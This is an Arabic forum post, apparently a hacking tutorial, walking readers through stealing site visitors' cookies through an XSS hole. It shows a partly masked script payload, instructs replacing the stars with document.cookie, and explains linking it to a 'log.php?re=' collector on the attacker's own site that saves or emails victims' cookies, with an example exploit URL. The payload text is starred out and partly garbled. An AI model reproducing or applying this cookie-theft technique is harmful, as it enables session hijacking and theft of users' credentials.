السلام عليكم ورحمه الله وبركاته : نأتي الان الى الكود المهم في ثغرات xss هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات XSS كود : **********javascript:alert(****************)</Script> يمكنك تغيير * بأي رقم تريده للتجربة فقط هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز يحتوي على اليوزر نايم و الباسوورد المشفر ب الامدي 5 جيد الان سنقوم بربط السكربت باللوج ماهو اللوج ؟ اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز التي تخصه في هذا اللوج و يرسل الى ايمايلك او يحفظ في اللوج على حسب طريقة صنعك له مثال لطريقة ربط اللوج log.php?re= كود : **********javascript:alert(****************)</Script> الان بعدما ربطنا السكربت باللوج ناتي لربطه برابط الموقع مثال لطريقة ربط السكربت و اللوج برابط الموقع انا عندي مثلا رابط الموقع هو http://www.dark.night.com/ سيكون الستغلال بالشكل التالي http://www.dark.night.com/log.php?re كود : **********javascript:alert(****************)</Script> و الان ساضع رابط اللوج بالمرفقات يجب عليك تحميله و تنفيد الاوامر التالية ضع بدل هذه الجملة ايمايلك h- -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة - php افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد وارفعه على موقعك او على موقع اخر استبدل النجوم بالكلمه هذي d o c u m e n t.c o o k i e
الله يرفع قدرك
قوانين المنتدى
